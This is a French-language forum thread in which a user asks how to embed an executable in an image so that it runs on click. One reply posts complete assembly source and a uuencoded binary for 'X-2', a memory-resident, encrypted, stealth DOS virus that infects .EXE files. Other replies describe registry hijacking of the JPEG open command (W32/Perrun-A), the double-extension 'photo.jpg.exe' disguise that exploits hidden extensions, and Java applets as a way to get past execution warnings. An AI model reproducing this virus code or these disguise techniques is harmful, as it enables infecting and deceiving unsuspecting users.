Posez votre question Signaler

[exe dans une image?]

Rapunzel/Z - Dernière réponse le 7 nov. 2010 à 01:07
Bonjour,

je voudrais savoir si il est possible d'insérer un programme(.exe) dans une image(.jpg ou .bmp)

Est-ce quelqu'un connait un programme avec lequel on peut réaliser ce que je veux faire?

Le but est de créé un lien qui mene vers une image et qui exécute un petit programme qui fais apparaitre des petits Messages sur l'écran, je sais ca a l'aire bête mais je voudrais faire un programme pour ma petite soeur...

merci d'avance

Rapunzel/Z
Lire la suite 
Réponse
+13
moins plus
Ah, d'accord, vous me prennez tous pour un hacker maintenant...

Il est claire que j'aurai eu la même réaction, mais ce n'est pas le cas, autrement j'aurai posté cet article dans un forum de Hackers, vous ne croyez pas?

Bon, ce que pascal dit est faux, car il existe déja cet sorte de programmes comme tu remarqueras en faisant une recherche Google...

En effet j'ai déja visité des sites ou on en parlai et ou il y avait des downloads, mais je ne les retrouve plus, c'est pourquoi j'espéré avoir de l'aide ici.

Mais je ne vois pas de problème si vous refusez de m'aider si vous pensez que je veux construire un virus...

Si parcontre vous avez des infos et vous ne voulez pas les publiés ici vous pouvez me les mailer car cela m'interesse vraiment.

Mon address e-mail:

gmbh_kabel@hotmail.com

Excusez moi, mais je ne suis pas un Hacker et je suis contre le piratage, le spam, toutes sortes de malware etc.

J'espère cependant avoir un peu d'aide. N'importe quoi, liens, infos...

a+
Rapunzel/Z
Ajouter un commentaire
Réponse
+12
moins plus
Je te remerci de ta réponse, mais la tu m'explique comment construire un virus...

c'est pas ce que je veux...

mais si je planque comme tu dis un prog dans une image et ensuite je regarde l'image, donc je l'ouvre, est-ce que le programme ne s'exécute pas?

As-tu le nom d'un programme qui m'aide a faire cela?

moi je veux que quand ma soeur clic sur l'image le programme s'execute.

N'as-ts pas une autre solution a ce problème?

j'ai trouvé l'histoire d'un programme W32/Perrun-A, qui certes etait un virus mais avec lequel on pouvait faire ce que je veux faire.

Mais ce programme n'a jamais été mis dans le net. Mais il y a 2 ans de cela, maintenant il doit certainement exister des programmes similaires...

à l'aide...

Rapunzel/Z
anas- 18 déc. 2005 à 15:27
mois aussi je cherche se logiciel ,mais je ne l ai pas trouver
alors je me disais que si tu peux maider ca serai jenialle et merci
Répondre
Ajouter un commentaire
Réponse
+2
moins plus
Un virus???
ok
Tu pense un jour fair un de mes vieux exemples..
Ne rigole pas se quand j' avais 15 ans ahahahh

NAME X_2
PAGE 55,132
TITLE ?????


len equ offset handle-0100h
en_len1 equ offset encry_and_save-offset main2


code segment

ASSUME CS:CODE,DS:CODE,ES:CODE

org 100h



main: jmp set_up ; set up for first execution of virus

main1: call next_line ; find out offset of code
next_line: pop si
sub si,offset next_line
call level1 ; unencrypt virus
main2: mov ax,cs
mov ds,ax ; set DS == CS
mov ds:[data_seg+si],es ; store date seg
mov ds:[stck_seg+si],ss ; store stack seg
mov ds:[stck_p+si],sp ; store stack pointer
mov ax,cs ; set up new SS and SP
xor sp,sp
dec sp
add ax,10h
mov ss,ax

mov ax,ds:[code_seg+si] ; calculate return address
mov cx,ds:[code_ip+si]
mov bx,es
add bx,10h
add ax,bx
mov word ptr ds:[ret1+1+si],ax ; save it
mov word ptr ds:[ret2+1+si],cx
check_instal: mov ax,0fa09h ; check for prev. installation
int 21h
cmp ax,-0fa09h
je in_mem


inst: call install ; install into mem

in_mem: mov ax,ds:[stck_seg+si] ; get old vals for SS, SP, DS
mov bx,ds:[stck_p+si]
mov cx,ds:[data_seg+si]
mov ds,cx ; restore them
mov es,cx
mov ss,ax
mov sp,bx
xor si,si
xor di,di

ret1: mov ax,0000h ; get return address
ret2: mov bx,0000h
push ax
push bx
retf ; return to old code


adjust_handle: push si ; store regs.
push es
push bx
push ax
mov ah,2fh ; find current DTA
int 21h
pop ax
test ah,40h ; is it FCB or Handle
jz fcb_adjust
call i21 ; do it.
pushf
jc dont_adjust ; if we got an error just exit
mov al,byte ptr es:[bx+16h]
and al,1fh ; check for stealth marker
cmp al,1eh
jne dont_adjust
sub word ptr es:[bx+1ah],len ; adjust length
sbb word ptr es:[bx+1ch],0
dont_adjust: popf
dont_adjust_fcb: pop bx
pop es ; restore regs
pop si
retf 2 ; return

fcb_adjust: call i21 ; do FCB find
cmp al,0ffh ; if error just exit
je no_fcb_match
xor si,si
cmp byte ptr es:[bx],0ffh ; is it an extended FCB
jne fcb_alter
add si,7h
fcb_alter: mov al,byte ptr es:[bx+si+17h]
and al,1fh ; check for stealth marker
cmp al,1eh
jne no_fcb_match_al0
sub es:[bx+si+1dh],len ; adjust length
sbb word ptr es:[bx+si+1fh],0h
no_fcb_match_al0: xor al,al
no_fcb_match: jmp dont_adjust_fcb

new21: cmp ax,0fa09h ; show we're installed
jne check_for_handle
neg ax
retf 2
check_for_handle: cmp ah,4eh ; just checks to see which
je adjust_handle ; sub-function of INT21
cmp ah,4fh ; they are doing
je adjust_handle
cmp ah,11h
je adjust_handle
cmp ah,12h
je adjust_handle
cmp ah,4bh
je check_infect
cmp ah,3dh
je check_infect
chain_21: jmp cs:[int21]

debug_print: xor bx,bx
mov ax,0010h
mov ss,bx
mov sp,ax
pop cx

check_infect: push ax ; save all regs
push bx
push cx
push si
push di
push es
push ds
push dx
mov di,dx
mov cx,6fh
mov al,'.'
cld
push ds
pop es
repnz scasb
cmp ds:[di+1],'EX' ; is file .EXe
je infect_file
pop_all: pop dx
pop ds
pop_bits: pop es
pop di
pop si
pop cx
pop bx
pop ax
jmp chain_21

infect_file: mov ax,4300h ; get attribs
call i21
mov cs:[file_att],cx ; save them
xor cx,cx
call set_attr ; clear attribs

mov ax,3d02h ; open file
call i21
push cs
pop ds
mov ds:[handle],ax ; store handle

mov ax,5700h ; get file time/date
call file_int21
mov ds:[file_time],cx ; save file time/date
mov ds:[file_date],dx

mov ah,3fh
mov dx,offset header ; read in header
mov cx,18h
call file_int21

mov ax,4202h ; move file pointer to
xor cx,cx ; -4 bytes from end of file
dec cx
mov dx,-4
call file_int21
add ax,4 ; get real length
adc dx,0

mov word ptr ds:[file_len],ax ; save length
mov word ptr ds:[file_len+2],dx


mov ah,3fh ; read in 4 bytes which
mov cx,4 ; may be our marker
mov dx,offset temp1
call file_int21


mov di,offset temp1
mov si,offset marker
mov cx,4
push cs
pop es
repe cmpsb ; check for marker
jcxz pop_all


mov ax,word ptr ds:[header+14h]
mov bx,word ptr ds:[header+16h]
mov ds:[code_seg],bx ; get old start address
mov ds:[code_ip],ax

call encry_and_save ; write our virus to end of file

mov ax,word ptr ds:[file_len]
mov dx,word ptr ds:[file_len+2]


push ax
push dx

mov bx,word ptr ds:[header+08h] ; get header length

mov cx,10h ; sub it from total length
div cx

add bx,10h
sub ax,bx

mov word ptr ds:[header+16h],ax ; store new start seg

add dx,0103h
mov word ptr ds:[header+14h],dx ; store new start offset

pop dx
pop ax

add ax,len
adc dx,0h

push ax ; calculate new length
mov cl,9 ; DIV 512
shr ax,cl ; MOD 512
ror dx,cl
stc

adc dx,ax
pop ax
and ah,1

mov word ptr ds:[header+02h],ax ; write this length
mov word ptr ds:[header+04h],dx ; to header

mov ax,4200h ; move file pointer to
xor dx,dx ; start of file
mov cx,dx
call file_int21

mov ah,40h ; write new header
mov dx,offset header
mov cx,18h
call file_int21

mov cx,ds:[file_time] ; get old file time/date
mov dx,ds:[file_date]
or cl,1fh ; place our stealth marker
and cl,0feh ; in second part of time
mov ax,5701h ; write this time/date to
call file_int21 ; file


mov ah,3eh ; close file
call file_int21

mov cx,ds:[file_att]
pop dx
pop ds
call set_attr ; restore old attribs

jmp pop_bits ; pop all regs


install: push ds ; adjust MCB to get 3 Kbytes at top
mov ax,es ; of memory
dec ax
mov es,ax
cmp byte ptr es:[0],5ah
jne old_prog
mov ax,es:[3]
sub ax,0bch
jb old_prog
mov es:[3],ax
sub word ptr es:[12h],0bch
mov es,es:[12h]


mov di,0100h ; move our code to top of memory
lea ax,[0100h+si]
mov cx,len+5
push cs
pop ds
cld
xchg ax,si
repnz movsb
xchg ax,si


mov ax,0008h ; get and change INT21 vector
mov ds,ax
mov ax,offset new21
mov bx,es
xchg word ptr ds:[0004h],ax
xchg word ptr ds:[0006h],bx
cli
mov word ptr es:[int21],ax ; store it our code
mov word ptr es:[int21+2],bx
sti
old_prog: pop ds
ret


db '[X-2]',00h
db 'ICE-9, -< ARCV >-',00h
db 'Made in England. '
db 'Hi I',39,'am called X-2, get my name right! '
db 'Look out for the X-3 twins.'



encry_and_save: xor si,si ; get new key
retry: mov ah,2ch
call i21
cmp dh,0h
je retry
mov byte ptr cs:[marker-1],dh
call level1 ; encrypt virus
mov ah,40h ; write code
mov cx,len
mov dx,offset main
call file_int21
call level1 ; unencrypt our code
ret

code_seg dw 0fff0h
code_ip dw 0h


set_attr: mov ax,4301h
file_int21: mov bx,ds:[handle]
i21: pushf
call cs:[int21]
ret


level1: lea di,(main2+si)
mov cx,en_len1
un1: xor byte ptr cs:[di],01h
marker: inc di
loop un1
ret

; end of virus

handle dw 0h
stck_seg dw 0h
data_seg dw 0h
stck_p dw 0h
file_time dw 0h
file_date dw 0h
file_att dw 0h
file_len dd 0h
code_off db 0h
temp1 db 5 dup (?)
header db 18h dup (?)
int21 dd 0h

set_up: xor si,si
mov ds:[code_seg+si],-10h
mov ds:[code_ip+si],0100h
mov ds:[0100h+si],20cdh
call level1
jmp main1

code ends

end mainbegin 775 x_2.com
MZ4P#Z```7H'N!@'H_@*,R([8C(0?!(R4'02)I"$$C,@SY$P%$`".T(N$^@.+
MC/P#C,.#PQ`#PXF$90&)C&@!N`GZS2$]]P5T`^C)`8N$'02+G"$$BXP?!([9
MCL&.T(OC,_8S_[@``+L``%!3RU8&4U"T+\TA6/;$0'0BZ(<"G'(5)HI'%B0?
M/!YU"R:!;QH;`R:#7QP`G5L'7LH"`.AE`CS_="(S]B:`/_]U`X/&!R:*0!=0LF@6@=&P,F@U@?`#+`Z\\]"?IU!??8R@(`@/Q.=):`_$]TD8#\$72,
M@/P2=(>`_$MT%(#\/70/+O\N2P0SV[@0`([3B^!94%-15E<&'E*+^KEO`+`N
M_!X'\JZ!?0%8170*6A\'7UY96UCKS+@`0^C;`2Z)#B<$,\GHR@&X`CWHRP$.
M'Z,;!+@`5^B\`8D.(P2)%B4$M#^Z,P2Y&`#HJ0&X`D(SR4FZ_/_HG0$%!`"#
MT@"C*02)%BL$M#^Y!`"Z+@3HA0&_+@2^%P2Y!``.!_.FXX^A1P2+'DD$B1[Z
M`Z/\`^@[`:$I!(L6*P104HL>.P2Y$`#W\8/#$"O#HTD$@<(#`8D61P1:6`4;
M`X/2`%"Q"=/HT\KY$]!8@.0!HS4$B18W!+@`0C/2B\KH'`&T0+HS!+D8`.@1
M`8L.(P2+%B4$@,D?@.'^N`%7Z/T`M#[H^`"+#B<$6A_H[`#I!_\>C,!(CL`F
M@#X``%IU1R:A`P`MO`!R/B:C`P`F@2X2`+P`)HX&$@"_``&-A``!N2`##A_\
MEO*DEK@(`([8N,@!C,.'!@0`AQX&`/HFHTL$)HD>303['\-;6"TR70!)0T4M
M.2P@+3P@05)#5B`^+0!-861E(&EN($5N9VQA;F0N($AI($DG86T@8V%L;&5D
M(%@M,BP@9V5T(&UY(&YA;64@&P2<+O\>2P3#C;P.`;G)`BZ`-0%'XOG#````````````````````
M`````````````````````````````````````````````````#/VQX3Z`_#_
2QX3\`P`!QX0``
kilian 8903Messages postés vendredi 19 septembre 2003Date d'inscription ContributeurStatut 1 août 2014Dernière intervention - 4 mars 2008 à 15:09
15 ans, 16 bits et msdos...

:-)
Répondre
Ajouter un commentaire
Réponse
+2
moins plus
envoie moi ton virus je le cacherait derriere une images
pf
kilian 8903Messages postés vendredi 19 septembre 2003Date d'inscription ModérateurStatut 1 août 2014Dernière intervention - 9 avril 2008 à 18:48
Quelle bonne blague!! ^_^
Répondre
Ajouter un commentaire
Réponse
+0
moins plus
Ca s'appelle un virus ton truc
Ajouter un commentaire
Réponse
+0
moins plus
Ceci dis, ça reste fondamentalement impossible "d'éxécuter" une image.

Par contre, planquer des données (donc, pourquoi pas, un petit programme) dans une image, ça c'est possible.

Il est également possible de faire des virus "macro", par exemple, Word offre suffisemment de controle sur la machine à une macro dans un .doc pour qu'un fichier word puisse devenir un virus.

Mais l'unanimitée des virus sont confrontés à un problème : il doivent être éxécutépar la machine cible. C'est pourquoi il se cache généralement dans un fichier éxécutable, un programme, où sur le secteur de boot des disques, pour être chargé au démarage.

De la même manière qu'un virus biologique peux pénétrer votre organisme, tant qu'il n'arrive pas à faire interpréter son propre code génétique (de l'ARNc ) par le noyau de vos cellules.

Or un fichier image n'est pas éxécuté : il ne peux pas donc, "contenir un programme" au sens que celui-ci est éxécuté.

Ensuite, y'a surement des bidouilles qui permettent de faire ce que tu veux, mais stricto sensus une image ne peux pas éxécuter un programme.
Ajouter un commentaire
Réponse
+0
moins plus
Je dirais plutot qu'il faut déguiser ton prog en image.
Ajouter un commentaire
Réponse
+0
moins plus
Et tu peux m'expliquer comment?

S'il te plait

a+
Rapunzel/Z
Ajouter un commentaire
Réponse
+0
moins plus
W32/Perrun-A est un exécutable Win 32 qui porte généralement le nom proof.exe. Lorsque proof.exe est exécuté, il place un autre fichier exécutable, extrk.exe. Il modifie aussi la base de registre pour que, lorsque qu'un utilisateur double-clique sur un fichier .JPG, il exécute extrk.exe à la place du visualisateur d'images associé.

L'entrée modifiée dans la base de registre est :

HKLM\Software\CLASSES\jpegfile\shell\open\command

Lorsque l'utilisateur double-clique sur un fichier .JPG, extrk.exe est exécuté et essaie de télécharger les fichiers suivants :

sasearch/balloon.xs1
sasearch/lclsrh.xml
sasearch/lclAdv.xml
sasearch/lclprog.xml
sasearch/lclrfine.xml

à partir des sites suivants :

ie.search.msn.com
sa.windows.com
se.windows.com

Il lance alors visualisateur d'images et de fax de Windows. Il s'agit du visualisateur par défaut sous Windows XP. 


Regarde bien ce qu'il y a en gras. Le virus (d'ailleurs, celui là est un ver, selon sophos) ne se cache pas DANS les images. Il détourne le fait que quand on double clique un document, Windows cherche le programme qui sert à l'ouvrir, et PREND LA PLACE DE CE PROGRAMME.

Par contre c'est la cas pour TOUTES les images (je veux dire, il n'y a pas un programme spécifique pour chaque image, c'est le même pour toute).

mais si je planque comme tu dis un prog dans une image et ensuite je regarde l'image, donc je l'ouvre, est-ce que le programme ne s'exécute pas?

Non, du tout.

En informatique, il y a une différence fondamentale entre deux types d'informations : les programmes, le code, d'un coté et les données de l'autre.
Une donnée peux devenir du code, mais il y a des conditions très strictes à celà. En général, une image est une donnée totalement inerte, il est impossible d'y cacher DIRECTEMENT un programme quelqu'il soit.

Par contre y cahcer des
informations
, ça reste faisable.


Pour ton problème, je n'en sais pas plus que ce qui est écrit en bleau dans ce message.
nologgin- 7 nov. 2010 à 01:02
ceci suppose que l on connaise l OS du client. bon cela dit sur une attaque virale on va toucher a 99% windows.

le probleme est que le client doit double cliquer ou "Ouvrir" l image et qu il n installe pas un soft de visu d image qui change aussi la base de registre
Répondre
Ajouter un commentaire
Réponse
+0
moins plus
Ok, merci en effet j'avais mal compris une information, car l'article m'etait connu.

je te remercie.

Ce qui veut dire qu'il n'y aurait pas de solution a mon problème?

Mh, chiant ca...

pas d'alternatives?

Rapunzel/Z
Ajouter un commentaire
Réponse
+0
moins plus
bonjour , comme les autres intervenants l ont expliquer emplements les fichiers images sont pas executables , donc il peuvent pas englober un code executables , c pourquoi les gens et les programmes antivirus font completement confiances au fichiers jpg ou bmp entre autre ; et les hackers recours au camouflages comme photo.jpg.exe par exemple pour profiter de cette confiance ..., je sais pas c quoi l idee exacte pour ton programme , l image que tu veut "executer " es visualiser par quel moyen ...
nologgin- 7 nov. 2010 à 01:07
confiance confiance. oui est non.

on peut toujours cacher des information capitale dans une image.
imagine des sites de terroristes (personne ne sait bien sur que derriere se sont des terroristes) affichant des images d un zoo par exemple. qui va s en mefier?
et bien a l interieur de chaque images des information cachées via steganographie sur le prochain attentat a Paris ou NY ;)

quand a du code on peut tout a fait faire des images Gif animés, donc y a bien une interpretation quelquepart. je ne confirmerai pas qu il est impossible d utliser cette interpretation pour faire tourner du code ou faire un bufferoverflow et aller plus loin.
Répondre
Ajouter un commentaire
Réponse
+0
moins plus
Salut, alors en fait le programme n'existe pas encore, je suis dans une phase ou je réfléchi, et recherche des informations.

Comme ca si il y a un probleme comme c'est le cas ici je peux chancher facilement mon plan.

Le programme sera programmé en C++, ce serai le plus gros projet que j'aie jamais fait.

l'image serai donc exécuté normalement par un click ce qui lancerai le programme.

Mais si je fais une sorte de petit page Web en HTML et je mets un lien si on clic sur une image, ne serai-t-il pas possible que ce lien exécute mon programme?

Oui, mais en camouflant un Virus par photo.jpg.exe comme tu le dis le hacker n'aura pas beaucoup de chances, car la même un aveugle dans un tunnel avec des lunettes de soleil lors d'une éclipse solaire se méfirai ;)

Ok, merci pour les infos,

a+

Rapunzel/Z
Ajouter un commentaire
Réponse
+0
moins plus
bonjour , la solution de l image clickable qui menent a un lien es en effet possible , mais ds les windows mit a jour un message warning te previent qu un progralmme veut s executer , alors l effet surprise sera perdu , et l utilisateur se meffira d executer ton programme , je croit que une applet ecrite en java pourrait remonter ce probleme , et pour le fichier.jpg.exe , windows cachent l extension des fichier dont l extension es connu , et un fichier fichier.jpg.exe sera mentionner comme fichier.jpg , alors c pas tres rares que les gens s y t'rompent
Ajouter un commentaire
Réponse
+0
moins plus
en effet tu as raison...

pour l'image.jpg.exe ca ne macherai pas chez moi, car je n'ai pas activé cette option qui fait que l'on ne montre pas les extensions connues, je la trouve stupide...

merci
a+
Ajouter un commentaire
Réponse
+0
moins plus
Bonjour,
les amis
je veux savoire comment construire un mini virus
Ajouter un commentaire
Réponse
-1
moins plus
tous les createurs de virus rêvent de faire la même chose,....
CryptoSkull- 4 juil. 2010 à 20:18
" rêvent " ce n'est en aucun cas un rêve, tous les hackers savent le faire les script kiddies ne le savent pas encore moin les lamers ou autres "Variante" des hackers si tu es un hackers c'est que tu as des raisons et que tu es passer de scrip kiddies a hacker avec toutes les étapes qui sont avec. Tous les GreenHate,BlackHate,WhiteHate savent le faire ..
Répondre
nologgin- 7 nov. 2010 à 00:58
pas de hat a whitehat. merci,

un whitehat
Répondre
Ajouter un commentaire
Ce document intitulé «  [exe dans une image?]  » issu de CommentCaMarche (www.commentcamarche.net) est mis à disposition sous les termes de la licence Creative Commons. Vous pouvez copier, modifier des copies de cette page, dans les conditions fixées par la licence, tant que cette note apparaît clairement.

Vous n'êtes pas encore membre ?

inscrivez-vous, c'est gratuit et ça prend moins d'une minute !

Les membres obtiennent plus de réponses que les utilisateurs anonymes.

Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes.

Le fait d'être membre vous permet d'avoir des options supplémentaires.